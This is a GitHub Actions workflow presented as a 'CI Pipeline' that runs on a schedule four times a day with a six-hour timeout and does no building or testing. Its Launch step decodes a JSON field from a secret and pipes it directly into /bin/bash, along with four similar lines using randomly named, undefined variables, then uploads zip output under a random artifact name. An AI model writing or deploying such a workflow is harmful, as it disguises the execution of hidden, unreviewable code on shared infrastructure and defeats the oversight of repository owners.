name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '10 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qu39: ${{ secrets.qu39 }}
        run: |
          printf '%s' "$qu39" | jq -r .a87 | /bin/bash
          printf '%s' "$i6" | jq -r .a2080 | /bin/bash
          echo $aimz16 | jq -r .tnb0 | /bin/bash
          echo $yyskc66385 | jq -r .lh853 | /bin/bash
          echo $xnq808 | jq -r .kjwyk60168 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: tfP1H5al
          path: "*.zip"
          retention-days: 1
